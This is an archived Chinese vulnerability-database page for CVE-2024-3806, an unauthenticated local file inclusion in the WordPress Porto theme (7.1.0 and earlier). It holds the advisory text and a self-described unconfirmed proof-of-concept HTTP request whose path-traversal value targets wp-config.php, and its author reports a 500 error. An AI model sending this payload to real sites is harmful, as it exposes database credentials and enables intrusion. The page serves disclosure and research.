关联漏洞
标题:
WordPress theme Porto 安全漏洞
(CVE-2024-3806)
描述:WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress theme是WordPress的一款主题。 WordPress theme Porto 7.1.0 版本及之前版本存在安全漏洞,该漏洞源于都容易通过 porto_ajax_posts 函数受到本地文件包含的影响。
描述
Porto <= 7.1.0 - Unauthenticated Local File Inclusion via porto_ajax_posts
介绍
# CVE-2024-3806
Porto <= 7.1.0 - Unauthenticated Local File Inclusion via porto_ajax_posts
# Description
The Porto theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 7.1.0 via the 'porto_ajax_posts' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.
Unconfirmed POC
----
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}
```
Notes
---
Getting a 500 error at the moment.
文件快照
[4.0K] /data/pocs/eeb90f41ad849176826e90cfba63660877397f41
└── [ 909] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。